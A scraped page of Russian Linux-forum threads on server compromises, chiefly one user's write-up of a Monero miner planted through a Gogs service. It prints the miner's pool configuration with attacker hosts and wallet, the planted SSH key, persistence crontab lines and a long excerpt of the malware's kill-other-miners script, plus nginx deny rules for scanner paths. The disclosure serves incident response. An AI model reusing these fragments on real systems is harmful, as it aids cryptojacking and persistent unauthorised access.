LINUX.ORG.RU

11
Всего сообщений: 111

взломали сервер?

Больше 10 лет арендую Linux сервер в Нидерландах под сайты и свои сервисы. Никому пароли не давал, кроме саппорта Leaseweb. Сегодня, захожу в очередной раз по SSH и вижу в истории консоли ряд команд, которые я не выполнял:

certbot certonly -d msdn.ddnsgeek.com –manual –preferred -challenges http

ls -la /etc/letsencrypt/live/msdn.ddnsgeek.com-0002

rm -rf msdn.ddnsgeek.com.conf security-linux.webredirect.org.conf

service nginx restart

rm -rf /home/parser_test/

cd /home/dnsparser_test/public_html/.well-known/acme-challenge/

ls -la

rm *

ls -la

nano NrLzewrQypAhY7AMW2np9Z6bfNTmnwX5-AkGz1ss4_U

Вопрос, что это было? Вообще, у letsencrypt есть непонятные мне домены в renewal, которые не принадлежат мне, но думал может это служебные какие, а теперь уже сомневаюсь

azure-update.mywire.org.conf

msdn.ddnsgeek.com.conf

wsus-check.mywire.org.conf

Причем даты создания разные, февраль, апрель, октябрь… мой сервер по-тихой в ботнет вовлекли? Кроме смены пароля на root что еще сделать? В такой ситуации впервые за 15 лет…

 , , , ,

InSane ()

Твич надо?

Пишут, что хакнули твич (что-то модное вроде) и слили исходники и данные, если кому не лень качать, отпишитесь, есть там что-нибудь интересное.

https://www.videogameschronicle.com/news/the-entirety-of-twitch-has-reportedl...

Похоже никому это не интересно, ну и ладно.

 ,

ddidwyll ()

Бан IP ботов-взломщиков на VPS

Здравствуйте, уважаемые программисты и разработчики сайтов, а также дизайнеры и анонимы!

Боты ищут на сайте уязвимости по адресам типа xx.php, m.php, bb.php, shell.php, root.php, wp-login.php , /news/wp-includes/wlwmanifest.xml и прочие ворпрессы. Что-то, относящееся к адресам Drupal 9, на котором работает сайт, сложно найти, видимо его реже всего взламывают. Вот примерный error.log nginx

2021/09/16 09:42:28 [error] 16450#16450: *484923 access forbidden by rule, client: 141.101.76.52, server: site.com, request: "GET /wp-content/ HTTP/1.1", host: "site.com"
2021/09/16 10:59:08 [error] 16450#16450: *485803 access forbidden by rule, client: 141.101.76.94, server: site.com, request: "GET /wp-content/ HTTP/1.1", host: "site.com"
2021/09/16 12:14:54 [error] 16450#16450: *486788 FastCGI sent in stderr: "Unable to open primary script: /var/www/site.com/www/x.php (No such file or directory)" while reading response header from upstream, client: 141.101.77.224, server: site.com, request: "GET /x.php HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "site.com"
2021/09/16 12:14:54 [error] 16450#16450: *486788 FastCGI sent in stderr: "Unable to open primary script: /var/www/site.com/www/wso.php (No such file or directory)" while reading response header from upstream, client: 141.101.77.224, server: site.com, request: "GET /wso.php HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "site.com"
2021/09/16 12:14:55 [error] 16450#16450: *486788 FastCGI sent in stderr: "Unable to open primary script: /var/www/site.com/www/srx.php (No such file or directory)" while reading response header from upstream, client: 141.101.77.224, server: site.com, request: "GET /srx.php HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "site.com"
2021/09/16 12:14:55 [error] 16450#16450: *486788 FastCGI sent in stderr: "Unable to open primary script: /var/www/site.com/www/1337.php (No such file or directory)" while reading response header from upstream, client: 141.101.77.224, server: site.com, request: "GET /1337.php HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "site.com"
2021/09/16 12:14:55 [error] 16450#16450: *486788 FastCGI sent in stderr: "Unable to open primary script: /var/www/site.com/www/xx.php (No such file or directory)" while reading response header from upstream, client: 141.101.77.224, server: site.com, request: "GET /xx.php HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "site.com"

Были добавлены запреты на доступ к таким адресам, но эта мера видится не достаточной:

    # block wordpress bots
    location ~ ^/(wordpress|wp-) {
        deny all;
    }
    # block joomla bots
    location ~ ^/(administrator) {
        deny all;
    }
    # block drupal bots
    location ~ ^/(sites/all/libraries/elfinder|sites/all/libraries/plupload) {
        deny all;
    }
    # block other bots
    location ~ ^/(old|new|oldsite|site|test|components|connectors|ckeditor|fckeditor|xmlrpc\.php|images/.*\.php) {
        deny all;
    }

Подскажите, есть ли способ забанить серые IP, с которых происходят такие запросы, и есть ли готовая база серых ip?

Больше всего отличились следующие ip:

$ grep -e 'forbidden by rule' -e 'No such file' error.log | grep -o 'client: [\.0-9]*' | cut -d' ' -f2 | sort | uniq -u
108.162.215.102
108.162.215.138
108.162.219.176
108.162.221.16
108.162.221.50
108.162.229.88
108.162.237.138
108.162.237.142
108.162.237.194
108.162.245.50
108.162.249.94
108.162.250.181
141.101.104.29
141.101.105.132
141.101.105.252
141.101.105.66
141.101.105.74
141.101.76.100
141.101.76.154
141.101.76.172
141.101.76.208
141.101.76.52
141.101.76.94
141.101.77.155
141.101.77.19
141.101.77.218
141.101.96.139
141.101.98.130
141.101.99.65
162.158.107.175
162.158.111.175
162.158.119.67
162.158.129.124
162.158.166.139
162.158.178.168
162.158.178.9
162.158.183.167
162.158.183.171
162.158.183.223
162.158.183.225
162.158.187.141
162.158.191.158
162.158.203.43
162.158.203.45
162.158.227.194
162.158.255.134
162.158.50.33
162.158.62.179
162.158.88.200
162.158.89.235
162.158.89.59
162.158.90.42
162.158.90.88
162.158.91.119
162.158.93.207
162.158.94.186
162.158.94.210
172.68.10.234
172.68.11.85
172.68.141.58
172.68.142.89
172.68.144.23
172.69.194.28
172.69.208.136
172.69.34.184
172.69.34.230
172.69.35.181
172.69.54.243
172.69.55.106
172.69.55.40
172.69.62.7
172.69.63.63
172.69.63.9
172.69.68.13
172.69.68.167
172.70.110.136
172.70.110.220
172.70.114.42
172.70.114.80
172.70.126.112
172.70.126.26
172.70.127.29
172.70.130.84
172.70.134.154
172.70.147.100
172.70.147.38
172.70.147.70
172.70.147.84
172.70.35.49
172.70.35.87
172.70.98.174
172.70.98.66
173.245.52.213
173.245.54.231
197.234.242.188

 , , , ,

youni ()

АХТУНГ: Пишу из горящего танка , ко мне на linux ПК влез майнер!

GOGS НАВЕРНОЕ НЕ ВИНОВААААТ!!!!!!!!!!!!! UPDATE3 НИЖЕ!!!!!!! Я ЛОХХХХХХХХХ :D

Подробности чуть попозже я сейчас аудит аудитаю. Сеть включил только что-бы отписать, сейчас вырублю.

Суть у меня от отдельного пользователя по имени gogs был запущен сервис gogs через systemd https://i.ibb.co/qpthFzW/20210913040630-494x376.png не так давно мне приспичило перезагрузить комп ибо я забыл на проце виртулизацию активировать, и после включения и поднятия гогса 3 ядра проца зависли на 100% я увидал это https://i.ibb.co/GWB9Qwz/20210913033655-1408x93.png погрепал нашёл это https://i.ibb.co/bsKhpD5/20210913040047-507x381.png

В логал скрипты долбились во всё, но остались под пользователем gogs. Процессы (там ещё были) я не убил, а приостановил. Хороче сейчас всё проверю и вернусь.

Почему гогс? Да потому что он запускался от отдельного пользователя и кроме настроенного gogs там ничего нет. У меня сейчас скрипты, ssh ключ публичный который прописался вместо того что был, бинарник этой хрени и логи немного. Я хз куда скидывать эту гадость, да и скидывать ли?

UPDATE

И так сегодня ночью я перезагрузил ПК. Обнаружил что 3 ядра процессора заняты на 100% увидев запущенный процесс ./kswapd0 запущенный от пользователя gogs которого я создал что-бы от его имени запускалась git вебморда одноимённого проекта.

Все процессы от имени пользователя gogs я приостановил, отключил все сетевые соединения и погасил интерфейсы eth0,wlan0

Cверил /etc с бекапом по sha512 всё прежнее, на месте, обновлённое проверил глазами, никаких прописанных кронов и сервисов нет.

Все файлы из пользователя gogs скопировал в отдельный каталог для изучения. Запущенные процессы не имели открытых файлов поэтому там изучать нечего я их просто убил. Так же вычистил всё что-было связано с пользователем gogs и затем удалил его самого. Всё. Проверил свой хомяк, левых бинарей у меня нет. ssh по ключам. Никакой активности всё штатно. Эта вода что-бы не отвечать на вопросы, а ты это, а ты то.

И так, запустил я компуктер и запустился гогс сервер (а я реееедко перезагружаюсь) Его лог на момент запуска.

2021/09/13 00:17:31 [TRACE] Doing: MirrorUpdate
2021/09/13 00:27:31 [TRACE] Doing: MirrorUpdate
2021/09/13 00:31:38 [TRACE] Log Mode: File (Trace)
2021/09/13 00:31:38 [ INFO] Gogs 0.11.53.0603
2021/09/13 00:31:38 [ INFO] Cache Service Enabled
2021/09/13 00:31:38 [ INFO] Session Service Enabled
2021/09/13 00:31:38 [ INFO] Git Version: 2.33.0
2021/09/13 00:31:38 [TRACE] Doing: CheckRepoStats
2021/09/13 00:31:38 [ INFO] SQLite3 Supported
2021/09/13 00:31:38 [ INFO] Run Mode: Production
2021/09/13 00:31:39 [ INFO] Listen: http://0.0.0.0:3000
2021/09/13 00:31:58 [TRACE] Log Mode: File (Trace)
2021/09/13 00:31:58 [ INFO] Gogs 0.11.53.0603
2021/09/13 00:31:58 [ INFO] Cache Service Enabled
2021/09/13 00:31:58 [ INFO] Session Service Enabled
2021/09/13 00:31:58 [ INFO] Git Version: 2.33.0
2021/09/13 00:31:58 [ INFO] SQLite3 Supported
2021/09/13 00:31:58 [ INFO] Run Mode: Production
2021/09/13 00:31:58 [TRACE] Doing: CheckRepoStats
2021/09/13 00:31:58 [TRACE] Log Mode: File (Trace)
2021/09/13 00:31:58 [ INFO] Gogs 0.11.53.0603
2021/09/13 00:31:58 [ INFO] Cache Service Enabled
2021/09/13 00:31:58 [ INFO] Session Service Enabled
2021/09/13 00:31:58 [ INFO] Git Version: 2.33.0
2021/09/13 00:31:58 [ INFO] SQLite3 Supported
2021/09/13 00:31:58 [ INFO] Run Mode: Production
2021/09/13 00:31:58 [TRACE] Doing: CheckRepoStats
2021/09/13 00:31:58 [ INFO] Listen: http://0.0.0.0:3000
2021/09/13 00:41:58 [TRACE] Doing: MirrorUpdate

Во время его работы были созданы файлы с датой создания Пн 13 сен 2021 00∶31∶38 в каталоге ./configrc

.configrc$ ls -lAR
.:
итого 16
drwxrwxrwx 2 1002 1002 4096 сен 13 05:44 a
drwxrwxrwx 2 1002 1002 4096 сен 13 05:44 b
-rwxrwxrwx 1 1002 1002  271 сен 13 00:31 cron.d
-rwxrwxrwx 1 1002 1002   21 сен 13 00:31 dir2.dir

./a:
итого 2820
-rwxrwxrwx 1 1002 1002     876 сен 13 00:31 a
-rwxrwxrwx 1 1002 1002       1 сен 13 02:44 bash.pid
-rwxrwxrwx 1 1002 1002      23 сен 13 02:44 dir.dir
-rwxrwxrwx 1 1002 1002    9568 сен 13 00:31 init0
-rwxrwxrwx 1 1002 1002 2843144 сен 13 00:31 kswapd0
-rwxrwxrwx 1 1002 1002      10 сен 13 05:44 .procs
-rwxrwxrwx 1 1002 1002     226 сен 13 00:31 run
-rwxrwxrwx 1 1002 1002     700 сен 13 00:31 stop
-rwxrwxrwx 1 1002 1002     202 сен 13 00:31 upd

./b:
итого 84
-rwxrwxrwx 1 1002 1002 11634 сен 13 05:44 1
-rwxrwxrwx 1 1002 1002   157 сен 13 00:31 a
-rwxrwxrwx 1 1002 1002    23 сен 13 00:31 dir.dir
-rwxrwxrwx 1 1002 1002 50935 сен 13 00:31 run
-rwxrwxrwx 1 1002 1002  6004 сен 13 00:31 stop
-rwxrwxrwx 1 1002 1002    42 сен 13 00:31 sync

Внутри видно kswapd0 который и был запущен. Это бинарь упакованый. Внутри майнер xmrig c вшитым конфигом вот такого содержания

            "algo": null,
            "coin": "monero",
            "url": "[2a0e:fa00:0:5::1]:80",
            "user": "483fmPjXwX75xmkaJ3dm4vVGWZLHn3GDuKycHypVLr9SgiT6oaZgVh26iZRpwKEkTZCAmUS8tykuwUorM3zGtWxPBFqwuxS",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "enabled": true,
            "tls": false,
            "tls-fingerprint": null,
            "daemon": false,
            "self-select": null
         },
         {
            "algo": null,
            "coin": "monero",
            "url": "[2a0e:fa00:0:5::1]:443",
            "user": "483fmPjXwX75xmkaJ3dm4vVGWZLHn3GDuKycHypVLr9SgiT6oaZgVh26iZRpwKEkTZCAmUS8tykuwUorM3zGtWxPBFqwuxS",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "enabled": true,
            "tls": false,
            "tls-fingerprint": null,
            "daemon": false,
            "self-select": null
         },
   	 {
            "algo": null,
            "coin": "monero",
            "url": "debian-package.center:80",
            "user": "483fmPjXwX75xmkaJ3dm4vVGWZLHn3GDuKycHypVLr9SgiT6oaZgVh26iZRpwKEkTZCAmUS8tykuwUorM3zGtWxPBFqwuxS",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "enabled": true,
            "tls": false,
            "tls-fingerprint": null,
            "daemon": false,
            "self-select": null
        },
        {
            "algo": null,
            "coin": "monero",
            "url": "45.9.148.125:80",
            "user": "483fmPjXwX75xmkaJ3dm4vVGWZLHn3GDuKycHypVLr9SgiT6oaZgVh26iZRpwKEkTZCAmUS8tykuwUorM3zGtWxPBFqwuxS",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "enabled": true,
            "tls": false,
            "tls-fingerprint": null,
            "daemon": false,
            "self-select": null
        },
        {
            "algo": null,
            "coin": "monero",
            "url": "45.9.148.125:443",
            "user": "483fmPjXwX75xmkaJ3dm4vVGWZLHn3GDuKycHypVLr9SgiT6oaZgVh26iZRpwKEkTZCAmUS8tykuwUorM3zGtWxPBFqwuxS",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "enabled": true,
            "tls": false,
            "tls-fingerprint": null,
            "daemon": false,
            "self-select": null
        },
        {
            "algo": null,
            "coin": "monero",
            "url": "45.9.148.129:80",
            "user": "483fmPjXwX75xmkaJ3dm4vVGWZLHn3GDuKycHypVLr9SgiT6oaZgVh26iZRpwKEkTZCAmUS8tykuwUorM3zGtWxPBFqwuxS",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "enabled": true,
            "tls": false,
            "tls-fingerprint": null,
            "daemon": false,
            "self-select": null
        },
        {
            "algo": null,
            "coin": "monero",
            "url": "45.9.148.129:443",
            "user": "483fmPjXwX75xmkaJ3dm4vVGWZLHn3GDuKycHypVLr9SgiT6oaZgVh26iZRpwKEkTZCAmUS8tykuwUorM3zGtWxPBFqwuxS",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "enabled": true,
            "tls": false,
            "tls-fingerprint": null,
            "daemon": false,
            "self-select": null
        },
        {
            "algo": null,
            "coin": "monero",
            "url": "45.9.148.117:80",
            "user": "483fmPjXwX75xmkaJ3dm4vVGWZLHn3GDuKycHypVLr9SgiT6oaZgVh26iZRpwKEkTZCAmUS8tykuwUorM3zGtWxPBFqwuxS",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "enabled": true,
            "tls": false,
            "tls-fingerprint": null,
            "daemon": false,
            "self-select": null
        },
        {
            "algo": null,
            "coin": "monero",
            "url": "45.9.148.117:443",
            "user": "483fmPjXwX75xmkaJ3dm4vVGWZLHn3GDuKycHypVLr9SgiT6oaZgVh26iZRpwKEkTZCAmUS8tykuwUorM3zGtWxPBFqwuxS",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "enabled": true,
            "tls": false,
            "tls-fingerprint": null,
            "daemon": false,
            "self-select": null
        },
        {
            "algo": null,
            "coin": "monero",
            "url": "45.9.148.58:80",
            "user": "483fmPjXwX75xmkaJ3dm4vVGWZLHn3GDuKycHypVLr9SgiT6oaZgVh26iZRpwKEkTZCAmUS8tykuwUorM3zGtWxPBFqwuxS",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "enabled": true,
            "tls": false,
            "tls-fingerprint": null,
            "daemon": false,
            "self-select": null
        },
        {
            "algo": null,
            "coin": "monero",
            "url": "45.9.148.58:443",
            "user": "483fmPjXwX75xmkaJ3dm4vVGWZLHn3GDuKycHypVLr9SgiT6oaZgVh26iZRpwKEkTZCAmUS8tykuwUorM3zGtWxPBFqwuxS",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "enabled": true,
            "tls": false,
            "tls-fingerprint": null,
            "daemon": false,
            "self-select": null
        },
        {
            "algo": null,
            "coin": "monero",
            "url": "45.9.148.59:80",
            "user": "483fmPjXwX75xmkaJ3dm4vVGWZLHn3GDuKycHypVLr9SgiT6oaZgVh26iZRpwKEkTZCAmUS8tykuwUorM3zGtWxPBFqwuxS",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "enabled": true,
            "tls": false,
            "tls-fingerprint": null,
            "daemon": false,
            "self-select": null
        },
        {
            "algo": null,
            "coin": "monero",
            "url": "45.9.148.59:443",
            "user": "483fmPjXwX75xmkaJ3dm4vVGWZLHn3GDuKycHypVLr9SgiT6oaZgVh26iZRpwKEkTZCAmUS8tykuwUorM3zGtWxPBFqwuxS",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "enabled": true,
            "tls": false,
            "tls-fingerprint": null,
            "daemon": false,
            "self-select": null
        }
    ],
    "print-time": 60,
    "health-print-time": 60,
    "retries": 1,
    "retry-pause": 3,
    "syslog": false,
    "user-agent": null,
    "watch": true,
    "pause-on-battery": false
}

Сам бинарник публиковать не буду.

Одним из скриптов был удалён и вновь создан каталог .ssh с содержимым.

.ssh/authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr

SHA512 всех этих файлов

1ba854c321d89441291da2638d65748ffa06923a63fd2bb9be8a66440236503fb34e375726a8da679b55ced51dda82293ffcfb8bb76563e2da0071222d3247bf  .ssh/authorized_keys

3567d8d553d42e4450683126ac7beac5c5e713091b20aaf28040d91bfebe19b0431588d7c34e4a3d5c6e4f7af45e1ccce7654e730c0512c0c5c5d28be548cb24  .configrc/cron.d

ee8c0f03fa194321a0a8324418ba3204b06323a424b295b514213e90aa656a47d76e2f81074d46ccddd7801276de7d5665a3bbd770507dc6425e697b5bc97c95  .configrc/dir2.dir

f26bcbdcf7417308bdec3f3f8b6ef453d2b7417b16d015eeddfc447955068b48667554fd9a1b896ee9d44ac3c2cac54137fc455c45f94251f42e5e3a1e7b6230  .configrc/a/a

be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09  .configrc/a/bash.pid

1bc338f3ed46c8623a6a6e871d71a7641d7daa5494b2502523c21f1d5af097ada2c441bf12f222a3d61dc7169494693635ea14200faabae6993781c16167abac  .configrc/a/dir.dir

8ff2784f8437875a8b388d3f0d7eaf4b9d98c2374aafbd33df19f1255842889caf9bdafb55c5f9ac5e937624aae58fc1845134335916f79648e8a5d4de077d79  .configrc/a/init0

ede860bbec1a47a971a5bcfd024a9e338b2fdfe407df00b0cd0f4e436e3175d31f68964605b351abc3784d5c9046cd00189b7b3a82359cfeb1081b5d85cd6dda  .configrc/a/kswapd0

a7b00698bf4d74c154ea4fdc1b76eae4ca6319189d63354a77f2a813ae248d36b16154f6f3d7f9ae3d5fa84e882e7476b02f1870fde3f3251f3d4f4733cc0a22  .configrc/a/run

b8bc24b9ea7b26e18bb26c9b1887f600142d5f283f074d64db72a9fea551f754904b1c8e93cb58282eb08fec5b03730ab66351526567a39c78f57648af40bc3f  .configrc/a/stop

fdceef26293c927036bec874457fd8e7a7baa94188a8f8720aeed5e2041ee412eee8731a1df1ce17b5d35ed47e0c39828156db78af6e0134f4e7bcebf5557e7a  .configrc/a/upd
 
91da308e50e177c9b7df28d4feaf6d9a20593d997bdbde232110216b7d346a39197960f4d342d3b9a7498ed68018cd375cfab22245ec4d7ab03fcab56753d862  .configrc/a/.procs

95305080f1dc993c89dde01138a2b915e20201bf6bdd7595393708b72d2b75abd376ac0c4df53fc72e33555294cedf60f3c702ad72bb3f8d5d461c2e42f26da1  .configrc/b/1

21d49249ca656d3f6ce7a77876796590ae66d31963a6cdf65bb294ca45372e68686f8f7fd846035ed53f1155962447a8054bf2ea081e02fbb4b3fa1b6e376881  .configrc/b/a

a99d5a12ce0e3d4fe1b8606200376b239bfe668353a2402f45eccd61c33451a466f663fe0c5817b41c2e748f69f36dece3b1887a7f290b0e5375abc9c47c1dad  .configrc/b/dir.dir

0dc180b53574dce4de4160c54810a019edae1828f0cc6c1513a3dac7173833e41d19cc9a81b762136e37a7c578a43508f076a8fa9fc9ff919a0748f259d431fe  .configrc/b/run

cd1c489afdcd9a02a05401e803e238417e2421b7f43b93b25b882d2bd005ff2e4ae61f3bd47aaa5577d9c3573c34dfe7ee6801abdc16bfe38c70550c97358f2a  .configrc/b/stop

3b196433e2d0c57946d61512b004e14c46e1207d3de5a0dcbaa62966b98449c08c3074d29cf0211648a26db2298caa4af294c69dcd8ab4cf4ec16dda14d23bf0  .configrc/b/sync

Есть лог вот с таким сорержимым https://pastebin.com/5LyB7pP9

Внутри скриптов немного логики, определение процессора, много base64 строк, это бинарники которые скрипты восстанавливают если надо.

От пользователя отдельного этого запускался только gogs в автоматическом режиме, всё. Я считаю виноват гогс.

./gogs --version
Gogs version 0.11.53.0603
sha512sum ./gogs 
c7a5541cd03fdc69b12c714be32ba6d6e8fdad5af42b865a3cd1d333db6cba0130130399b6a8283dacab3794ff1b359e865fe47085633cb892d6119f6642603f  ./gogs

Хотел залить куда то вдруг кому покопать интересно, но в этом смысла нет, можно просто скачать нужную версию и проверить хеш, если совпало значит оно.

Конфиг был такой

APP_NAME = Gogs
RUN_USER = gogs
RUN_MODE = prod

[database]
DB_TYPE  = sqlite3
HOST     = 127.0.0.1:3306
NAME     = gogs
USER     = root
PASSWD   = 
SSL_MODE = disable
PATH     = /home/gogs/gogs/data/gogs.db

[repository]
ROOT = /home/gogs/gogs-repositories

[server]
DOMAIN           = localhost
HTTP_PORT        = 3000
ROOT_URL         = http://localhost:3000/
DISABLE_SSH      = false
SSH_PORT         = 22
START_SSH_SERVER = false
OFFLINE_MODE     = false

[mailer]
ENABLED = false

[service]
REGISTER_EMAIL_CONFIRM = false
ENABLE_NOTIFY_MAIL     = false
DISABLE_REGISTRATION   = true
ENABLE_CAPTCHA         = false
REQUIRE_SIGNIN_VIEW    = true

[picture]
DISABLE_GRAVATAR        = false
ENABLE_FEDERATED_AVATAR = false

[session]
PROVIDER = file

[log]
MODE      = file
LEVEL     = Info
ROOT_PATH = /home/gogs/gogs/log

[security]
INSTALL_LOCK = true
SECRET_KEY   = AHYsdf2GIsqRJkD

Собственно вот и всё. Можно ещё написать подробностей, но мне спать хоца. Гланое хеши выложил и основную инфу, кому надо смогут проверить нет ли у них такой параши.

Сравнил ещё через diff -qr никаких различий в gogs у меня и тут https://github.com/gogs/gogs/releases/tag/v0.11.53 linux_amd64.tar.gz нет. Не считая мною созданных файлов и иного созданного в процессе работы. Там я всё глазами проверил всё чисто.

Подытожу. Был скачан gogs настроен как в конфиге выше, для него был создан пользоваьтель gogs в домешнем каталоге которого и находился исполняемый файл, был написан юнит как на скрине выше который запускался при старте системы. Всё. До этого всё нормально было и работало, но после перезагрузки от пользователя gogs создались файлы и запустили майнер.

Скрипты я публиковатьк как сказал не буду что-бы мамкиным какерам не давать инструменты. Но скажу, оно прописывает пользоватю задачу в cron которая располагалась в /var/spool/cron/crontabs/gogs

1 1 */2 * * /home/gogs/.configrc/a/upd>/dev/null 2>&1
@reboot /home/gogs/.configrc/a/upd>/dev/null 2>&1
5 8 * * 1 /home/gogs/.configrc/b/sync>/dev/null 2>&1
@reboot /home/gogs/.configrc/b/sync>/dev/null 2>&1  
0 */23 * * * /tmp/.X25-unix/.rsync/c/aptitude>/dev/null 2>&1

ОБРАТИТЕ ВНИМАНИЕ НА ПОСЛЕДНЮЮ СТРОЧКУ Если вы проверяете у себя.

В ./a/upd немного логики и запуск ./run и далее по цепочке, множество переходов вплоть до ./b где если сервер смотрит попой в мир с белым ip то всё, удалённый доступ есть по ключу. Но перед тем как запустится оно проверяте кучу майреров и пытается их убить лол )))))

Вон их скока всяких бывает


	killall \.Historys
	killall \.sshd
	killall neptune
	killall xm64
	killall xm32
	killall ld-linux
	killall xmrig
	killall \.xmrig
	killall suppoieup

	pkill -f sourplum
	pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
	
	ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
	ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
	ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
	ps auxf|grep -v grep|grep "119.9.76.107:443"|awk '{print $2}'|xargs kill -9
	ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9
	ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
	ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
	ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
	ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
	ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
	ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
	ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9
	ps auxf|grep -v grep|grep "xmrigDaemon" | awk '{print $2}'|xargs kill -9
	ps auxf|grep -v grep|grep "xmrigMiner" | awk '{print $2}'|xargs kill -9
	ps auxf|grep -v grep|grep "/var/tmp/java" | awk '{print $2}'|xargs kill -9
	ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9
	ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9
	ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -9
	ps auxf|grep -v grep|grep "/var/tmp/sustes" | awk '{print $2}'|xargs kill -9
	ps auxf|grep -v grep|grep "ld-linux" | awk '{print $2}'|xargs kill -9

	ps auxf|grep xiaoyao| awk '{print $2}'|xargs kill -9
	ps auxf|grep Donald| awk '{print $2}'|xargs kill -9
	ps auxf|grep Macron| awk '{print $2}'|xargs kill -9
	ps auxf|grep ld-linux| awk '{print $2}'|xargs kill -9

	ps auxf|grep named| awk '{print $2}'|xargs kill -9
	ps auxf|grep kernelcfg| awk '{print $2}'|xargs kill -9
	ps auxf|grep xiaoxue| awk '{print $2}'|xargs kill -9
	ps auxf|grep kernelupgrade| awk '{print $2}'|xargs kill -9
	ps auxf|grep kernelorg| awk '{print $2}'|xargs kill -9
	ps auxf|grep kernelupdates| awk '{print $2}'|xargs kill -9

	ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9
	ps ax|grep -o './[0-9]* -c'| xargs pkill -f

	pkill -f /usr/bin/.sshd
	pkill -f acpid
	pkill -f Donald
	pkill -f Macron
	pkill -f AnXqV.yam
	pkill -f apaceha
	pkill -f askdljlqw
	pkill -f bashe
	pkill -f bashf
	pkill -f bashg
	pkill -f bashh
	pkill -f bashx
	pkill -f BI5zj
	pkill -f biosetjenkins
	pkill -f bonn.sh
	pkill -f bonns
	pkill -f conn.sh
	pkill -f conns
	pkill -f cryptonight
	pkill -f crypto-pool
	pkill -f ddg.2011
	pkill -f deamon
	pkill -f disk_genius
	pkill -f donns
	pkill -f Duck.sh
	pkill -f gddr
	pkill -f Guard.sh
	pkill -f i586
	pkill -f icb5o
	pkill -f ir29xc1
	pkill -f irqba2anc1
	pkill -f irqba5xnc1
	pkill -f irqbalanc1
	pkill -f irqbalance
	pkill -f irqbnc1
	pkill -f JnKihGjn
	pkill -f jweri
	pkill -f kw.sh
	pkill -f kworker34
	pkill -f kxjd
	pkill -f libapache
	pkill -f Loopback
	pkill -f lx26
	pkill -f mgwsl
	pkill -f minerd
	pkill -f minergate
	pkill -f minexmr
	pkill -f mixnerdx
	pkill -f mstxmr
	pkill -f nanoWatch
	pkill -f nopxi
	pkill -f NXLAi
	pkill -f performedl
	pkill -f polkitd
	pkill -f pro.sh
	pkill -f pythno
	pkill -f qW3xT.2
	pkill -f sourplum
	pkill -f stratum
	pkill -f sustes
	pkill -f wnTKYg
	pkill -f XbashY
	pkill -f XJnRj
	pkill -f xmrig
	pkill -f xmrigDaemon
	pkill -f xmrigMiner
	pkill -f ysaydh
	pkill -f zigw
	pkill -f ld-linux

И это ещё не всё, лол.

Оно даже по портам своих друзей по роду ищет

	netstat -anp | grep 69.28.55.86:443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
	netstat -anp | grep 185.71.65.238 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
	netstat -anp | grep 140.82.52.87 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
	netstat -anp | grep 119.9.76.107 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
	netstat -anp | grep :443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
